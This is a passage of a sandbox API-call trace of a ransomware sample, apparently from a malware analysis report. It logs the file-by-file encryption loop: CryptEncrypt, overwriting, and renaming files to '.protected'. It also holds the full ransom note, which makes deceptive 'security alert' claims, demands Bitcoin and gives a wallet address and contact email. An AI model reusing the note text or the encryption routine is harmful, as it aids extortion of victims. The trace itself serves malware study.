lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.236] CloseHandle (hObject=0xb4) returned 1 [0095.237] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.237] lstrcmpiW (lpString1="Windows Live", lpString2="Windows") returned 1 [0095.237] lstrcmpiW (lpString1="Windows Live", lpString2="Program Files") returned 1 [0095.237] lstrcmpiW (lpString1="Windows Live", lpString2="Program Files (x86)") returned 1 [0095.237] lstrcmpiW (lpString1="Windows Live", lpString2="$Recycle.bin") returned 1 [0095.237] lstrcmpiW (lpString1="Windows Live", lpString2="System Volume Information") returned 1 [0095.237] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live") returned 43 [0095.237] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0095.237] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0095.237] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*") returned 45 [0095.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.247] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.247] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.247] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.247] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.247] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.247] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\.") returned 45 [0095.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.247] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) 
returned 1 [0095.247] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.247] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.247] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.247] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.247] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.247] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\..") returned 46 [0095.248] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.248] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.248] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.248] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Windows") returned -1 [0095.248] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Program Files") returned -1 [0095.248] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Program Files (x86)") returned -1 [0095.248] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="$Recycle.bin") returned 1 [0095.248] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="System Volume Information") returned -1 [0095.248] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0095.248] StrStrIW (lpFirst="Get Windows Live.url", lpSrch=".protected") returned 0x0 [0095.248] lstrcmpW (lpString1="Get Windows Live.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.248] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.249] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0095.249] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".txt") returned 0x0 [0095.249] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0095.249] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".rar") returned 0x0 [0095.249] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0095.249] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".zip") returned 0x0 [0095.249] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.250] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.250] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.250] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.250] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.250] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.250] CloseHandle (hObject=0xd4) returned 1 [0095.251] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.protected") returned 74 [0095.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.protected" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.protected")) returned 1 [0095.252] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.252] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Windows") returned 1 [0095.252] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Program Files") returned 1 [0095.252] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Program Files (x86)") returned 1 [0095.252] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="$Recycle.bin") returned 1 [0095.252] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="System Volume Information") returned 1 [0095.252] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0095.252] StrStrIW (lpFirst="Windows Live Gallery.url", lpSrch=".protected") returned 0x0 [0095.252] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="RESTORE_FILES.txt") returned 1 [0095.252] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.252] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.252] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0095.252] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".txt") returned 0x0 [0095.252] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0095.252] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".rar") returned 0x0 [0095.252] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0095.252] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".zip") returned 0x0 [0095.252] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.253] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.253] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.254] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.254] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.254] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.254] CloseHandle (hObject=0xd4) returned 1 [0095.255] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.protected") returned 78 [0095.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.protected" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.protected")) returned 1 [0095.256] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.256] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Windows") returned 1 [0095.256] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Program Files") returned 1 [0095.256] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Program Files (x86)") returned 1 [0095.256] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="$Recycle.bin") returned 1 [0095.256] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="System Volume Information") returned 1 [0095.256] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0095.256] StrStrIW (lpFirst="Windows Live Mail.url", lpSrch=".protected") returned 0x0 [0095.256] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="RESTORE_FILES.txt") 
returned 1 [0095.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.256] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0095.257] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".txt") returned 0x0 [0095.257] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0095.257] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".rar") returned 0x0 [0095.257] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0095.257] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".zip") returned 0x0 [0095.257] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.258] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.258] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.258] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.258] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.259] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.259] CloseHandle (hObject=0xd4) returned 1 [0095.259] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.protected") returned 75 [0095.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.protected" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.protected")) returned 1 [0095.260] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.260] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Windows") returned 1 [0095.260] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Program Files") returned 1 [0095.260] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Program Files (x86)") returned 1 [0095.260] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="$Recycle.bin") returned 1 [0095.260] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="System Volume Information") returned 1 [0095.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0095.260] StrStrIW 
(lpFirst="Windows Live Spaces.url", lpSrch=".protected") returned 0x0 [0095.260] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="RESTORE_FILES.txt") returned 1 [0095.260] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.260] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.261] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0095.261] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".txt") returned 0x0 [0095.261] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0095.261] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".rar") returned 0x0 [0095.261] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0095.261] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".zip") returned 0x0 [0095.261] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.262] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.262] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: 
lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.263] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.263] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.263] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.263] CloseHandle (hObject=0xd4) returned 1 [0095.264] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.protected") returned 77 [0095.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.protected" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.protected")) returned 1 [0095.264] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.264] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.265] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\RESTORE_FILES.txt") returned 61 [0095.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\favorites\\windows live\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.265] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.265] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.266] lstrlenA (lpString="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") returned 684 [0095.266] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.266] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.266] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0095.266] CloseHandle (hObject=0xb4) returned 1 [0095.267] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.267] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.267] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\RESTORE_FILES.txt") returned 48 [0095.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\favorites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.267] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.267] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.268] lstrlenA (lpString="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") returned 684 [0095.268] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.268] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.268] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.268] CloseHandle (hObject=0xa4) returned 1 [0095.269] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.269] lstrcmpiW (lpString1="Links", lpString2="Windows") returned -1 [0095.269] lstrcmpiW (lpString1="Links", lpString2="Program Files") returned -1 [0095.269] lstrcmpiW (lpString1="Links", lpString2="Program Files (x86)") returned -1 [0095.269] lstrcmpiW (lpString1="Links", lpString2="$Recycle.bin") returned 1 [0095.269] lstrcmpiW (lpString1="Links", lpString2="System Volume Information") returned -1 [0095.269] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links") returned 26 [0095.269] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0095.269] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0095.269] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\*") returned 28 [0095.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.271] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.271] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.271] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 